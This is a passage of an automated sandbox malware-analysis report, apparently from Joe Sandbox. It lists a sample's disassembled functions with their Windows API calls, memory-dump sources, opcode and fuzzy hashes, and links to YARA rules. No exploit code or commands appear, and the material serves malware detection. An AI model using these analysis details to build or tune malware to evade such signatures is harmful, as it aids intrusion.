                                                                                                                                                                                                                                  • GetEnabledXStateFeatures.KERNEL32(?,?,00000000,?,?,00007FF6385C63C6), ref: 00007FF6385CC4D5
                                                                                                                                                                                                                                  • InitializeContext.KERNEL32(?,?,00000000,?,?,00007FF6385C63C6), ref: 00007FF6385CC514
                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,00000000,?,?,00007FF6385C63C6), ref: 00007FF6385CC522
                                                                                                                                                                                                                                  • InitializeContext.KERNEL32(?,?,00000000,?,?,00007FF6385C63C6), ref: 00007FF6385CC576
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1327073451.00007FF6385C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6385C0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1326985565.00007FF6385C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327261799.00007FF638782000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327386065.00007FF6388B2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327583023.00007FF6388CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327761648.00007FF6388CF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327794330.00007FF6388D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327794330.00007FF6388DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327794330.00007FF6388E1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327865826.00007FF6388E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6385c0000_file.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ContextInitialize$AddressEnabledErrorFeaturesHandleLastModuleProcState
                                                                                                                                                                                                                                  • String ID: InitializeContext2$kernel32.dll
                                                                                                                                                                                                                                  • API String ID: 4102459504-3117029998
                                                                                                                                                                                                                                  • Opcode ID: 842e09f64cc07bfb6ffd64536c8495c82e0dc7659d3a4692a5304d1c7e8fa001
                                                                                                                                                                                                                                  • Instruction ID: 3b53a57071e764805011acbcaa9e01400a959ec7120a9113d10cc851c3db7784
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 842e09f64cc07bfb6ffd64536c8495c82e0dc7659d3a4692a5304d1c7e8fa001
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0331A327E1874681FA41CB71F4402B963A1AF44BE2F440035D94D837A4EF7DF98AEB18
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00007FF6385DF2A0 Relevance: 10.7, APIs: 7, Instructions: 227threadCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1327073451.00007FF6385C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6385C0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1326985565.00007FF6385C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327261799.00007FF638782000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327386065.00007FF6388B2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327583023.00007FF6388CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327761648.00007FF6388CF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327794330.00007FF6388D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327794330.00007FF6388DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327794330.00007FF6388E1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327865826.00007FF6388E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6385c0000_file.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: SwitchThread
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 115865932-0
                                                                                                                                                                                                                                  • Opcode ID: 00941ea838a74927b3197646182d1b4c896bb44e28a752c980c972a9e3e74503
                                                                                                                                                                                                                                  • Instruction ID: 40326c3741b7f05389c5d2223811658a9cdf2185035a45b1c967578fe01f1f54
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 00941ea838a74927b3197646182d1b4c896bb44e28a752c980c972a9e3e74503
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2EA16A37E0C20387F6A48B35A861AF566A4AF447A5F144235EC1DC67E2DE2FF448B748
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00007FF6385EFCE0 Relevance: 9.2, APIs: 6, Instructions: 184threadCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1327073451.00007FF6385C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6385C0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1326985565.00007FF6385C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327261799.00007FF638782000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327386065.00007FF6388B2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327583023.00007FF6388CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327761648.00007FF6388CF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327794330.00007FF6388D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327794330.00007FF6388DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327794330.00007FF6388E1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327865826.00007FF6388E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6385c0000_file.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: SwitchThread
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 115865932-0
                                                                                                                                                                                                                                  • Opcode ID: 88eb812f930dea6f5c706f698e86da7a776b86059163763e11a76009e92a9a9a
                                                                                                                                                                                                                                  • Instruction ID: 3da960f62410dc70baf981d70b9daed8128f7fbefcea944cbb10d8633acb6a32
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 88eb812f930dea6f5c706f698e86da7a776b86059163763e11a76009e92a9a9a
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 64816E33E081038BF6A45B359C516F56690AF407A4F0461B9E95CC63D2DE3FF841BB48
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00007FF6385C7610 Relevance: 7.6, APIs: 5, Instructions: 136threadCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1327073451.00007FF6385C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6385C0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1326985565.00007FF6385C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327261799.00007FF638782000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327386065.00007FF6388B2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327583023.00007FF6388CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327761648.00007FF6388CF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327794330.00007FF6388D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327794330.00007FF6388DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327794330.00007FF6388E1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327865826.00007FF6388E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6385c0000_file.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: PerformanceQuery$Counter$BuffersFlushFrequencyProcessSwitchThreadWrite
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3450244608-0
                                                                                                                                                                                                                                  • Opcode ID: c5ccaeed1bab535fe0671cbe44ddf89ccf1ec03c7d326c604e749402a2e002c3
                                                                                                                                                                                                                                  • Instruction ID: 70937428359165c69b75c16d96cb7bc1fecc7bb4120ab3382f88bee9f3444a6a
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c5ccaeed1bab535fe0671cbe44ddf89ccf1ec03c7d326c604e749402a2e002c3
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B251E627E0964686EAA09F39E4411F927B0FB44BA0F541031EE4D87797DE3EE405EB44
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00007FF6385C65E0 Relevance: 7.6, APIs: 5, Instructions: 52threadCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1327073451.00007FF6385C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6385C0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1326985565.00007FF6385C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327261799.00007FF638782000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327386065.00007FF6388B2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327583023.00007FF6388CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327761648.00007FF6388CF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327794330.00007FF6388D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327794330.00007FF6388DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327794330.00007FF6388E1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327865826.00007FF6388E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6385c0000_file.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Current$Thread$DuplicateExceptionFailFastHandleProcessQueryRaiseVirtual
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 510365852-0
                                                                                                                                                                                                                                  • Opcode ID: 934f69260269b245a23ceac455eb61daf11befa2e70e304a3ab56caa06914c26
                                                                                                                                                                                                                                  • Instruction ID: dd1a997f66ae2b309b2ab3dc4675d795a9ac4daa53d9a72cf27e0c5e57355cc2
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 934f69260269b245a23ceac455eb61daf11befa2e70e304a3ab56caa06914c26
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BA11F073E0974292EB88DB31B9412E9B3A0FB057A0F000139E75E87782DF79E461AB04
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00007FF6385C4680 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 126COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1327073451.00007FF6385C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6385C0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1326985565.00007FF6385C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327261799.00007FF638782000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327386065.00007FF6388B2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327583023.00007FF6388CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327761648.00007FF6388CF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327794330.00007FF6388D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327794330.00007FF6388DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327794330.00007FF6388E1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327865826.00007FF6388E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6385c0000_file.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ExceptionFailFastRaise
                                                                                                                                                                                                                                  • String ID: Process is terminating due to StackOverflowException.
                                                                                                                                                                                                                                  • API String ID: 2546344036-2200901744
                                                                                                                                                                                                                                  • Opcode ID: 75cf4704885808f0eb6ff8b498a01ad86faee032c79342b798ce3843b52c74cb
                                                                                                                                                                                                                                  • Instruction ID: 9ae97e5a9053eecd946e12736578785b5fd6d12e6172010628c9714d46dfd007
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 75cf4704885808f0eb6ff8b498a01ad86faee032c79342b798ce3843b52c74cb
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8951D927E0868281EF908B25D4407F823F1EF49BA5F455136DA1FC3792DF2EE546A708
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00007FF638604AF0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 73libraryloaderCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • LoadLibraryExW.KERNEL32(?,?,?,?,00000000,00007FF638604BED,?,?,00081000,00007FF6385F248C), ref: 00007FF638604B42
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,?,?,?,00000000,00007FF638604BED,?,?,00081000,00007FF6385F248C), ref: 00007FF638604B5C
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1327073451.00007FF6385C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6385C0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1326985565.00007FF6385C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327261799.00007FF638782000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327386065.00007FF6388B2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327583023.00007FF6388CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327761648.00007FF6388CF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327794330.00007FF6388D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327794330.00007FF6388DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327794330.00007FF6388E1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327865826.00007FF6388E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6385c0000_file.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                                                  • String ID: GetEnabledXStateFeatures$kernel32.dll
                                                                                                                                                                                                                                  • API String ID: 2574300362-4754247
                                                                                                                                                                                                                                  • Opcode ID: b6381558ee1b1e5cbd9979c419058fd06f1e19c69f60cab78635965a1811dbf7
                                                                                                                                                                                                                                  • Instruction ID: 5965a3544e525cd43bc6411a3651e63aaf011a6f9b64e05a90711ac4c4bbcead
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b6381558ee1b1e5cbd9979c419058fd06f1e19c69f60cab78635965a1811dbf7
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1721D293F2C16242FFB88634E0523F912D39B45799F448439C90EC2785EE1EEA90B60C
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00007FF6385CCA00 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 20libraryloaderCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1327073451.00007FF6385C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6385C0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1326985565.00007FF6385C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327261799.00007FF638782000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327386065.00007FF6388B2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327583023.00007FF6388CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327761648.00007FF6388CF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327794330.00007FF6388D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327794330.00007FF6388DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327794330.00007FF6388E1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327865826.00007FF6388E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6385c0000_file.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                                                  • String ID: GetEnabledXStateFeatures$kernel32
                                                                                                                                                                                                                                  • API String ID: 2574300362-4273408117
                                                                                                                                                                                                                                  • Opcode ID: b08a5a720ce188483b39534ef43e19380aa5d66f192d192fcf3d5c93a0855522
                                                                                                                                                                                                                                  • Instruction ID: 5f709c19ffaad15598a00e339e982db1570cd335804dedfe1db45c3fedff6960
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b08a5a720ce188483b39534ef43e19380aa5d66f192d192fcf3d5c93a0855522
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A8E04F56F2660281EE459731DC4A2E413A26F99B02FC85475C80D82391ED3EB64AAB04
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00007FF638600AF0 Relevance: 6.1, APIs: 4, Instructions: 126threadCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1327073451.00007FF6385C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6385C0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1326985565.00007FF6385C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327261799.00007FF638782000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327386065.00007FF6388B2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327583023.00007FF6388CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327761648.00007FF6388CF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327794330.00007FF6388D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327794330.00007FF6388DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327794330.00007FF6388E1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327865826.00007FF6388E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6385c0000_file.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: SwitchThread
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 115865932-0
                                                                                                                                                                                                                                  • Opcode ID: d060ab58e4891d87f918f318ed0f2b7e32d521a8a2381aa6b0013beb4367307f
                                                                                                                                                                                                                                  • Instruction ID: 8419e46b958c0c517004dbdb0d6b480da6417fc7fee3692307f1ea7e875d28d7
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d060ab58e4891d87f918f318ed0f2b7e32d521a8a2381aa6b0013beb4367307f
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9B41B273B1DA5685EB604E35D0506B97251EB06B98F648139CA0EC6785DF3FE440BB0E
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00007FF6385E3759 Relevance: 6.1, APIs: 4, Instructions: 119threadCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1327073451.00007FF6385C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6385C0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1326985565.00007FF6385C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327261799.00007FF638782000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327386065.00007FF6388B2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327583023.00007FF6388CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327761648.00007FF6388CF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327794330.00007FF6388D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327794330.00007FF6388DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327794330.00007FF6388E1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327865826.00007FF6388E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6385c0000_file.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: SwitchThread
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 115865932-0
                                                                                                                                                                                                                                  • Opcode ID: 4c2d10cc3444108c4523fbbaa5f59541c6da74beb0e924c2b778705351e09b8e
                                                                                                                                                                                                                                  • Instruction ID: 38950ec36ca2166aeec14dbcb2b8ec3ccf169fad620b5d6c7e77626079ac5340
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4c2d10cc3444108c4523fbbaa5f59541c6da74beb0e924c2b778705351e09b8e
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 50512732E0C24386F2A49B369C41AF626E1AF90764F147139E909C63D2DF3FB845A748
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00007FF6385CC600 Relevance: 6.0, APIs: 4, Instructions: 46COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • WaitForMultipleObjectsEx.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6385C6771), ref: 00007FF6385CC634
                                                                                                                                                                                                                                  • SetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6385C6771), ref: 00007FF6385CC63E
                                                                                                                                                                                                                                  • CoWaitForMultipleHandles.OLE32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6385C6771), ref: 00007FF6385CC65D
                                                                                                                                                                                                                                  • SetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6385C6771), ref: 00007FF6385CC671
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1327073451.00007FF6385C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6385C0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1326985565.00007FF6385C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327261799.00007FF638782000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327386065.00007FF6388B2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327583023.00007FF6388CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327761648.00007FF6388CF000.00000008.00000001.01000000.00000003.sdmpDownload File
